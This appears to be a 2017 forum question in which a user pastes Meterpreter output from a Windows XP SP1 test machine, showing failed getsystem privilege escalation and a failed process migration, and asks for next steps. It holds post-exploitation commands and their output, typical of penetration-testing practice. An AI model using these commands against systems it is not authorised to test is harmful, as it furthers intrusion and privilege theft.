AnsweredAssumed Answered

Help with getsystem/priv escalation

Question asked by alta ho on Apr 18, 2017
Latest reply on May 25, 2017 by Aman Agrawal



I am trying to use getsystem on a  Windows XP (Build 2600, Service Pack 1) test device and get the following:


meterpreter > getsystem

[-] priv_elevate_getsystem: Operation failed: Access is denied. The following was attempted:

[-] Named Pipe Impersonation (In Memory/Admin)

[-] Named Pipe Impersonation (Dropper/Admin)

[-] Token Duplication (In Memory/Admin)


meterpreter > getuid

Server username: test2\IWAM_TEST2


meterpreter > sysinfo

Computer        : TEST2

OS              : Windows XP (Build 2600, Service Pack 1).

Architecture    : x86

System Language : en_US

Domain          : WORKGROUP

Logged On Users : 5

Meterpreter     : x86/win32


After reading the blog posts I then tried migrating to  explorer.exe but got the insufficient privileges error:


3844  2452  explorer.exe


meterpreter > migrate 3844

[*] Migrating from 400 to 3844...

[-] Error running command migrate: Rex::RuntimeError Cannot migrate into this process (insufficient privileges)


Any suggestions to try from here please?